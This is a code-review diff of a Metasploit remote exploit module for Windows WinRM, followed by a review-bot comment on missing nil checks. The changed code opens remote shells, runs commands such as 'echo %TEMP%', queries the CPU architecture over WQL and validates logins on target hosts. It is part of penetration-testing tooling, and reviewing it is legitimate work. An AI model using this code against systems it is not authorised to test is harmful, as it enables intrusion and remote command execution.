||||||
print_status "Grabbing %TEMP%"
|
print_status "Grabbing %TEMP%"
|
||||||
resp,c = send_request_ntlm(winrm_open_shell_msg)
|
resp = send_winrm_request(winrm_open_shell_msg)
|
||||||
if resp.nil?
|
if resp.nil?
|
||||||
print_error "Got no reply from the server"
|
print_error "Got no reply from the server"
|
||||||
return nil
|
return nil
|
||||||
|
@ -152,16 +139,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
shell_id = winrm_get_shell_id(resp)
|
shell_id = winrm_get_shell_id(resp)
|
||||||
cmd = "echo %TEMP%"
|
cmd = "echo %TEMP%"
|
||||||
resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id))
|
resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id))
|
||||||
cmd_id = winrm_get_cmd_id(resp)
|
cmd_id = winrm_get_cmd_id(resp)
|
||||||
resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id))
|
resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id))
|
||||||
streams = winrm_get_cmd_streams(resp)
|
streams = winrm_get_cmd_streams(resp)
|
||||||
return streams['stdout'].chomp
|
return streams['stdout'].chomp
|
||||||
end
|
end
|
||||||
|
|
||||||
def check_remote_arch
|
def check_remote_arch
|
||||||
wql = %q{select AddressWidth from Win32_Processor where DeviceID="CPU0"}
|
wql = %q{select AddressWidth from Win32_Processor where DeviceID="CPU0"}
|
||||||
resp,c = send_request_ntlm(winrm_wql_msg(wql))
|
resp = send_winrm_request(winrm_wql_msg(wql))
|
||||||
#Default to x86 if we can't be sure
|
#Default to x86 if we can't be sure
|
||||||
return "x86" if resp.nil? or resp.code != 200
|
return "x86" if resp.nil? or resp.code != 200
|
||||||
resp_tbl = parse_wql_response(resp)
|
resp_tbl = parse_wql_response(resp)
|
||||||
|
@ -247,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def valid_login?
|
def valid_login?
|
||||||
data = winrm_wql_msg("Select Name,Status from Win32_Service")
|
data = winrm_wql_msg("Select Name,Status from Win32_Service")
|
||||||
resp,c = send_request_ntlm(data)
|
resp = send_winrm_request(data)
|
||||||
unless resp.code == 200
|
unless resp.code == 200
|
||||||
return false
|
return false
|
||||||
end
|
end
|
||||||
|
|
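Review bot: `valid_login?` dereferences `resp.code` immediately after the new `resp = send_winrm_request(data)`, yet `temp_dir` and the run_host hunks in this commit treat a nil return from `send_winrm_request` as expected, so an unreachable or non-WinRM host now ends in NoMethodError rather than the "does not appear to allow Negotiate (NTLM) auth" report that the removed `check` method used to give; `return false if resp.nil? || resp.code != 200` covers it. The same unchecked pattern appears in `temp_dir`, where `winrm_get_cmd_id(resp)` follows the second request directly. Removing `check` entirely also means the module no longer offers a check command; if that is intended, worth saying in the commit description.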